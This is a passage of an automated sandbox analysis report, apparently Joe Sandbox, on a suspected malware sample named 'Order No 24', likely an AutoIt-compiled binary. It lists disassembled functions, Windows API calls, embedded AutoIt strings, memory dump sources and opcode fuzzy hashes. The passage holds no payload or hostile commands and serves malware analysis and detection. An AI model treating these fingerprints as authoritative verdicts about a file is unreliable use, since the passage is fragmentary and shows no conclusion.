                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                                                                  • Instruction ID: 1b69f4f3828a0bbbec70ea8560542c03b8cccdbb99449495265bdb6156ece36e
                                                                                                                                  • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                                                                  • Instruction Fuzzy Hash: FBC1B2322055A30ADF2D467E843443EFAA55AE2BB531A176DE8B3CB4E5FF20C524D660
                                                                                                                                  Function 009A06D9 Relevance: .3, Instructions: 341COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                                                                  • Instruction ID: cef2fc28e40134aa6697d31b991e115e38b614b73b5cd5c98c8e20a593ddfaf3
                                                                                                                                  • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                                                                  • Instruction Fuzzy Hash: C6C1A0322055930AEF6D463EC43453EFAA95AE3BB131A076DD4B3CB4D5EF20D528D660
                                                                                                                                  Function 0099FE6F Relevance: .3, Instructions: 331COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                                                  • Instruction ID: db71717dfe34807b22839e021e66cab8e4e60c45000f8e530c3de7352c803737
                                                                                                                                  • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                                                  • Instruction Fuzzy Hash: 7BC1C2322091A30ADF2D867EC43453EFAA55AA37B131A077DD4B3CB4E5EF20C564D620
                                                                                                                                  Function 0099FA57 Relevance: .3, Instructions: 323COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                                  • Instruction ID: 3689d25faf122578b09900e3c11f72986f1fadfb8f7daee527dd3144cab6914c
                                                                                                                                  • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                                  • Instruction Fuzzy Hash: 7EC19E322094930ADF2D467EC47443EFAA95AA2BB531A077DD8B3CB5D5FF20C564D620
                                                                                                                                  Function 009DA2A9 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 009DA2FE
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 009DA310
                                                                                                                                  • DestroyWindow.USER32 ref: 009DA31E
                                                                                                                                  • GetDesktopWindow.USER32 ref: 009DA338
                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 009DA33F
                                                                                                                                  • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 009DA480
                                                                                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 009DA490
                                                                                                                                  • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009DA4D8
                                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 009DA4E4
                                                                                                                                  • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 009DA51E
                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009DA540
                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009DA553
                                                                                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009DA55E
                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 009DA567
                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009DA576
                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 009DA57F
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009DA586
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 009DA591
                                                                                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009DA5A3
                                                                                                                                  • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00A0D9BC,00000000), ref: 009DA5B9
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 009DA5C9
                                                                                                                                  • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 009DA5EF
                                                                                                                                  • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 009DA60E
                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009DA630
                                                                                                                                  • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009DA81D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                  • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                  • API String ID: 2211948467-2373415609
                                                                                                                                  • Opcode ID: 09c354eb9159f1b25566abc0814d96f6ad2e50c22464729a144f483d776db4d4
                                                                                                                                  • Instruction ID: 5ec785d81fc9488c99ba06d5b1049632dfa72469fc911e6a9ae17b67855003f8
                                                                                                                                  • Opcode Fuzzy Hash: 09c354eb9159f1b25566abc0814d96f6ad2e50c22464729a144f483d776db4d4
                                                                                                                                  • Instruction Fuzzy Hash: A0026E76900208EFDB14DFE4CD89EAE7BB9FB89310F048559F915AB2A0C7749D42CB60
                                                                                                                                  Function 009ED285 Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 009ED2DB
                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 009ED30C
                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 009ED318
                                                                                                                                  • SetBkColor.GDI32(?,000000FF), ref: 009ED332
                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 009ED341
                                                                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 009ED36C
                                                                                                                                  • GetSysColor.USER32(00000010), ref: 009ED374
                                                                                                                                  • CreateSolidBrush.GDI32(00000000), ref: 009ED37B
                                                                                                                                  • FrameRect.USER32(?,?,00000000), ref: 009ED38A
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 009ED391
                                                                                                                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 009ED3DC
                                                                                                                                  • FillRect.USER32(?,?,00000000), ref: 009ED40E
                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 009ED439
                                                                                                                                    • Part of subcall function 009ED575: GetSysColor.USER32(00000012), ref: 009ED5AE
                                                                                                                                    • Part of subcall function 009ED575: SetTextColor.GDI32(?,?), ref: 009ED5B2
                                                                                                                                    • Part of subcall function 009ED575: GetSysColorBrush.USER32(0000000F), ref: 009ED5C8
                                                                                                                                    • Part of subcall function 009ED575: GetSysColor.USER32(0000000F), ref: 009ED5D3
                                                                                                                                    • Part of subcall function 009ED575: GetSysColor.USER32(00000011), ref: 009ED5F0
                                                                                                                                    • Part of subcall function 009ED575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 009ED5FE
                                                                                                                                    • Part of subcall function 009ED575: SelectObject.GDI32(?,00000000), ref: 009ED60F
                                                                                                                                    • Part of subcall function 009ED575: SetBkColor.GDI32(?,00000000), ref: 009ED618
                                                                                                                                    • Part of subcall function 009ED575: SelectObject.GDI32(?,?), ref: 009ED625
                                                                                                                                    • Part of subcall function 009ED575: InflateRect.USER32(?,000000FF,000000FF), ref: 009ED644
                                                                                                                                    • Part of subcall function 009ED575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 009ED65B
                                                                                                                                    • Part of subcall function 009ED575: GetWindowLongW.USER32(00000000,000000F0), ref: 009ED670
                                                                                                                                    • Part of subcall function 009ED575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 009ED698
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3521893082-0
                                                                                                                                  • Opcode ID: 62e747d25e9171a9236a8efe0d67f5aa7876c25bddc5ef004a65b9268544485a
                                                                                                                                  • Instruction ID: 22b01dfa67d5b773daaec41a9384f438b570f8cdebb3507306c50e88b4f286e1
                                                                                                                                  • Opcode Fuzzy Hash: 62e747d25e9171a9236a8efe0d67f5aa7876c25bddc5ef004a65b9268544485a
                                                                                                                                  • Instruction Fuzzy Hash: 90919072009305BFCB11DFA4DC08E6B7BA9FF89325F101A19F962961E0D771E946CB52
                                                                                                                                  Function 009CDBC4 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 009CDBD6
                                                                                                                                  • GetDriveTypeW.KERNEL32(?,00A1DC54,?,\\.\,00A1DC00), ref: 009CDCC3
                                                                                                                                  • SetErrorMode.KERNEL32(00000000,00A1DC54,?,\\.\,00A1DC00), ref: 009CDE29
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorMode$DriveType
                                                                                                                                  • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                  • API String ID: 2907320926-4222207086
                                                                                                                                  • Opcode ID: 3821271af129e1242d3c523e39e9fd0255d5ecd8d7750d3bbaa3a48875597737
                                                                                                                                  • Instruction ID: daec9203a21439b55efc8f0ec1479911cd5a9ce970fc966481552adbafb66434
                                                                                                                                  • Opcode Fuzzy Hash: 3821271af129e1242d3c523e39e9fd0255d5ecd8d7750d3bbaa3a48875597737
                                                                                                                                  • Instruction Fuzzy Hash: 59518B31E49302ABCA00EF24C882F29B7A4FB94705F205D6EF0479B6D1DA64D946DB43
                                                                                                                                  Function 0098CC24 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 267COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __wcsnicmp
                                                                                                                                  • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                                  • API String ID: 1038674560-86951937
                                                                                                                                  • Opcode ID: f62830c1e58ffb27d9911de55534199bab3ca10088c424d6ac4bcae1c37651f9
                                                                                                                                  • Instruction ID: cb1f4289207b43232f8fdced7f53c223ad779521a6a0f1f35de00fdb29f945f1
                                                                                                                                  • Opcode Fuzzy Hash: f62830c1e58ffb27d9911de55534199bab3ca10088c424d6ac4bcae1c37651f9
                                                                                                                                  • Instruction Fuzzy Hash: 0081F7B1640219BBCB24BB68DD82FBF777CAF65310F144429F905AA2C2EB74D941C7A1
                                                                                                                                  Function 009EC6E9 Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 447windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 009EC788
                                                                                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 009EC83E
                                                                                                                                  • SendMessageW.USER32(?,00001102,00000002,?), ref: 009EC859
                                                                                                                                  • SendMessageW.USER32(?,000000F1,?,00000000), ref: 009ECB15
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Window
                                                                                                                                  • String ID: 0
                                                                                                                                  • API String ID: 2326795674-4108050209
                                                                                                                                  • Opcode ID: 18084bb29713178b6cf7b8b5532d538b7434d5d6feb05a772c05c1b832073461
                                                                                                                                  • Instruction ID: 0cade907614004d0198ee3401a8c65e136ff1c81d9962cecc614b7244ae80db7
                                                                                                                                  • Opcode Fuzzy Hash: 18084bb29713178b6cf7b8b5532d538b7434d5d6feb05a772c05c1b832073461
                                                                                                                                  • Instruction Fuzzy Hash: E8F1E2B1104385AFD722CF65CC89BAABBE8FF49314F080929F5C9962A1C775DC42CB91
                                                                                                                                  Function 009E638D Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CharUpperBuffW.USER32(?,?,00A1DC00), ref: 009E6449
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BuffCharUpper
                                                                                                                                  • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                                  • API String ID: 3964851224-45149045
                                                                                                                                  • Opcode ID: 7b26a310e4f9a28409c524a91571376b13711770b6c96b3774dd3a08578ac7d4
                                                                                                                                  • Instruction ID: 50d3ccdbe9b8a773120d9284614350b8c29c5570b082d22901d9bfd971a6a8f1
                                                                                                                                  • Opcode Fuzzy Hash: 7b26a310e4f9a28409c524a91571376b13711770b6c96b3774dd3a08578ac7d4
                                                                                                                                  • Instruction Fuzzy Hash: A1C180302043858BCB05EF15C551BBE77A5BFE8394F044859F8965B3E2EB25ED4ACB82
                                                                                                                                  Function 009ED575 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetSysColor.USER32(00000012), ref: 009ED5AE
                                                                                                                                  • SetTextColor.GDI32(?,?), ref: 009ED5B2
                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 009ED5C8
                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 009ED5D3
                                                                                                                                  • CreateSolidBrush.GDI32(?), ref: 009ED5D8
                                                                                                                                  • GetSysColor.USER32(00000011), ref: 009ED5F0
                                                                                                                                  • CreatePen.GDI32(00000000,00000001,00743C00), ref: 009ED5FE
                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 009ED60F
                                                                                                                                  • SetBkColor.GDI32(?,00000000), ref: 009ED618
                                                                                                                                  • SelectObject.GDI32(?,?), ref: 009ED625
                                                                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 009ED644
                                                                                                                                  • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 009ED65B
                                                                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 009ED670
                                                                                                                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 009ED698
                                                                                                                                  • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 009ED6BF
                                                                                                                                  • InflateRect.USER32(?,000000FD,000000FD), ref: 009ED6DD
                                                                                                                                  • DrawFocusRect.USER32(?,?), ref: 009ED6E8
                                                                                                                                  • GetSysColor.USER32(00000011), ref: 009ED6F6
                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 009ED6FE
                                                                                                                                  • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 009ED712
                                                                                                                                  • SelectObject.GDI32(?,009ED2A5), ref: 009ED729
                                                                                                                                  • DeleteObject.GDI32(?), ref: 009ED734
                                                                                                                                  • SelectObject.GDI32(?,?), ref: 009ED73A
                                                                                                                                  • DeleteObject.GDI32(?), ref: 009ED73F
                                                                                                                                  • SetTextColor.GDI32(?,?), ref: 009ED745
                                                                                                                                  • SetBkColor.GDI32(?,?), ref: 009ED74F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1996641542-0
                                                                                                                                  • Opcode ID: db7f01e7900745d764470b5711a6ce83478145fe19d0c3875106c4662a842074
                                                                                                                                  • Instruction ID: 8f72f958d7a00d0a971f5d197274771861ad16fbdc85478f68d1705e63090808
                                                                                                                                  • Opcode Fuzzy Hash: db7f01e7900745d764470b5711a6ce83478145fe19d0c3875106c4662a842074
                                                                                                                                  • Instruction Fuzzy Hash: 6F514B72901208AFDF11DFE9DC48AAE7B79FB08320F104615FA15AB2A1DB759A42CB50
                                                                                                                                  Function 009EB6C4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 009EB7B0
                                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 009EB7C1
                                                                                                                                  • CharNextW.USER32(0000014E), ref: 009EB7F0
                                                                                                                                  • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 009EB831
                                                                                                                                  • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 009EB847
                                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 009EB858
                                                                                                                                  • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 009EB875
                                                                                                                                  • SetWindowTextW.USER32(?,0000014E), ref: 009EB8C7
                                                                                                                                  • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 009EB8DD
                                                                                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 009EB90E
                                                                                                                                  • _memset.LIBCMT ref: 009EB933
                                                                                                                                  • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 009EB97C
                                                                                                                                  • _memset.LIBCMT ref: 009EB9DB
                                                                                                                                  • SendMessageW.USER32 ref: 009EBA05
                                                                                                                                  • SendMessageW.USER32(?,00001074,?,00000001), ref: 009EBA5D
                                                                                                                                  • SendMessageW.USER32(?,0000133D,?,?), ref: 009EBB0A
                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 009EBB2C
                                                                                                                                  • GetMenuItemInfoW.USER32(?), ref: 009EBB76
                                                                                                                                  • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 009EBBA3
                                                                                                                                  • DrawMenuBar.USER32(?), ref: 009EBBB2
                                                                                                                                  • SetWindowTextW.USER32(?,0000014E), ref: 009EBBDA
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
